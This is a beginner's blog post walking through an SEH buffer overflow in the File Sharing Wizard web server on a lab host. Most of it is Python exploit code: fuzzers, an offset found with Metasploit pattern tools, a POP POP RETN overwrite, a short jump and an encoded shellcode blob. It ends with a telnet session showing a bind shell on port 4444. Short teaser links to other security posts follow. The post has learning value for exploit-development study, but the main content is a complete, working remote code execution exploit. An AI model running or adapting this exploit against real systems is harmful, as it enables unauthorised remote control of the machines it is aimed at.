SEH Based Buffer Overflow

This time I will tell you about buffer overflow that occurs in the File Sharing Wizard application, this firs time I learn about buffer overflow.
we'll get a buffer overflow when we send to that aplication 2000 bytes of data, this the sample fuzzer with python  :

import socket
import sys
ips = '192.168.56.101'
port = 80
string = "A" * 2000
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()

whit that fuzzer aplication will crash but EIP not overwrite bicause this aplication protected whit SEH, we can see that with SEH chain menu in debugger :
After we know that, now look at how many byte SEH overwriting ? and we can use pattern_create.rb to create 2000 string. pattern_create.rb can be found in metasploit folder :

root@bt:/pentest/exploits/framework/tools# ruby pattern_create.rb 2000
that command will generate 2000 string that we can use it for fuzzer, like this :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
Execute that fuzzer and we will get this in our debuger :
To know how many byte 42386942 we can use pattern_offsec.rb :
root@bt:/pentest/exploits/framework/tools# ruby pattern_offset.rb 42386942
1044
Now we must look for POP POP RETN to overwrite EIP that protected with SEH, we can found that in executable modules and only modules there are not protected with SEHandler can be used. we can ceck it whith msfpescan . for this aplication I use modul libeay32.dll and this POP POP RETN in that modul :
that command in address 74D31567 , now we put that addres in our fuzzer in byte 1044 to overwrite SEH protection whit litle endian format, this our fuzzer after modified :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string+= "\xCC" * 44
string+= "\x67\x15\xD3\x74"
string+= "\x41" * (2000-len(string))
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()

wow.... after pop pop retn executed in four rows is string CC this our packet. we must jump of fiveth row whicth pop pop retn addres.and this fuzzer after modified :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string+= "\xCC" * 40
string+= "\xeb\x06\x90\x90"
string+= "\x67\x15\xD3\x74"
string+= "\x41" * (2000-len(string))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
I put  "\xeb\x06\x90\x90" in byte 1040-1044 for jump to 6 byte from that location bicause in byte 1045-1048 containing POP POP RETN addres. Now we set payload in bytes after 1044 contain     
string A or 41 in hexa  :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string+= "\xCC" * 40
string+= "\xeb\x06\x90\x90"
string+= "\x67\x15\xD3\x74"

string+=("\xda\xc7\x31\xc9\xb1\x51\xd9\x74\x24\xf4\xbf\x69\xf7\x14\xfe\x5a"
"\x31\x7a\x17\x03\x7a\x17\x83\x83\x0b\xf6\x0b\xaf\x9e\x1c\xbe\xa7"
"\xa6\x1c\xbe\xc8\x39\x68\x2d\x12\x9e\xe5\xeb\x66\x55\x85\xf6\xee"
"\x68\x99\x72\x41\x73\xee\xda\x7d\x82\x1b\xad\xf6\xb0\x50\x2f\xe6"
"\x88\xa6\xa9\x5a\x6e\xe6\xbe\xa5\xae\x2d\x33\xa8\xf2\x59\xb8\x91"
"\xa6\xb9\x69\x90\xa3\x49\x36\x7e\x2d\xa5\xaf\xf5\x21\x72\xbb\x56"
"\x26\x85\x50\x6b\x7a\x0e\x2f\x07\xa6\x0c\x51\x14\x97\xf7\xf5\x11"
"\x9b\x37\x7d\x65\x10\xb3\xf1\x79\x85\x48\xb1\x89\x8b\x26\xbc\xc7"
"\x3d\x5b\x90\x28\x97\xc5\x42\xb0\x70\x39\x57\x54\xf6\x4e\xa5\xfb"
"\xac\x4f\x19\x6b\x86\x5d\x66\x50\x48\x61\x41\xf9\xe1\x78\x08\x84"
"\x1f\x8a\xd7\xd3\xb5\x89\x28\x0b\x21\x57\xdf\x5e\x1f\x30\x1f\x76"
"\x33\xec\x8c\x25\xe7\x51\x60\x8a\x54\xa9\x56\x6a\x33\x44\x0b\x14"
"\x90\xef\x52\x4d\x7e\x54\x8e\x1d\xb8\xc3\x50\x0b\x2c\xfc\xff\xe6"
"\x4e\x2c\x97\xac\x1c\xe3\x81\xfb\xa1\x2a\x02\x56\xa1\x03\xcd\xbd"
"\x14\x22\x47\x6a\x58\xfc\x08\xc0\xf2\x54\x56\x38\x69\x3e\x4f\xc1"
"\x48\xc6\xd8\xce\x83\x6c\x18\xe0\x4a\xe5\x82\x66\xfb\x9a\x27\xef"
"\x1e\x36\xe8\xb6\xc9\x0b\x81\xaf\x60\xd0\x1b\xcd\x44\x18\xe8\xbb"
"\x59\xda\x22\x45\xe7\xf7\xaf\x34\x92\x3f\x7b\xed\xc8\x28\x09\x0f"
"\xbd\xbf\x12\x9a\x86\x40\x3a\x3f\x50\xed\x92\xee\x0f\x7b\x14\x41"
"\xe1\x2e\x47\x9e\xd1\xb9\xca\xb9\xd7\xf7\x46\xc6\x0e\x6d\x96\xc7"
"\x98\x8d\xb8\xbc\xb0\x8d\xba\x06\x5a\x91\x6b\xd4\x5c\xbd\xfc\xa6"
"\x7a\xdc\x8e\x05\x84\xf7\x8e\x79")
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()

 After fuzzer executed the aplication not crahs, but exploit stil running :
 root@bt:~/Desktop/tes# python fswizard-skeleton.py
[!] Launching Remote BoF on 192.168.56.101 ,hang on tight!
[*] Sending evil payload..

[*] Done! Check your debugger..
root@bt:~/Desktop/tes# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim>    

Comments

Post a Comment

Popular posts from this blog

Authorization Testing

Image
1. Testing for Path Traversal First, we test if it is possible to find a way to execute a path traversal attack and access reserved information About input vector: 2. Testing for bypassing authorization schema This kind of test focuses on verifying how the authorization schema has been implemented for each role/privilege to get access to reserved functions/resources. 3. Testing for Privilege Escalation During this phase, the tester should verify that it is not possible for a user to modify his or her privileges/roles inside the application in ways that could allow privilege escalation attacks.
Read more

Bypass HTML Field Restrictions

This time I learn about Bypass HTML Field Restrictions. I bypass the html form . In order to pass this lesson , I must submit the form with each field containing the value of unallowed . I have to submit an invalid value for all six fields in one delivery form provided . that is : select field which has two choices , radio button which has two choices , input field which retricted to 5 character, and disableinput field with a form that can not be filled . And this some way that I have tried to bypass it : First I submibt that form as usual and I did not find any change Then I tried to intercept request by webscarab, I change values that not provided there. but I not find any changes too. I studied again after it there are only 5 fields in the request when the procedure mentioned there are 6 fields . then I add a new field that is itself disableinput field , the parameter I get from the source web page . but I not find
Read more

Grabbing Proxy With Selenium and Python

Image
Selenium is automated browser that can be controlled by script. Selenium support for many programming language like Java, csharp, python, ruby, php, perl, and javascript. This simple script for grabbing proxy list from freeproxylist.net website created with python. 1. Install python selenium        # apt-get install python-pip        # pip install selenium 2. Download browser driver     Chrome : https://sites.google.com/a/chromium.org/chromedriver/downloads Edge : https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/ Firefox : https://github.com/mozilla/geckodriver/releases Safari : https://webkit.org/blog/6900/webdriver-support-in-safari-10/ Chose favorite browser you want. 3.  Run this script import os from selenium import webdriver from bs4 import BeautifulSoup from selenium.webdriver.common.keys import Keys chromedriver = "./chromedriver" # replace with your browser driver os.environ["webdriver.chrome.driver"] = chromed
Read more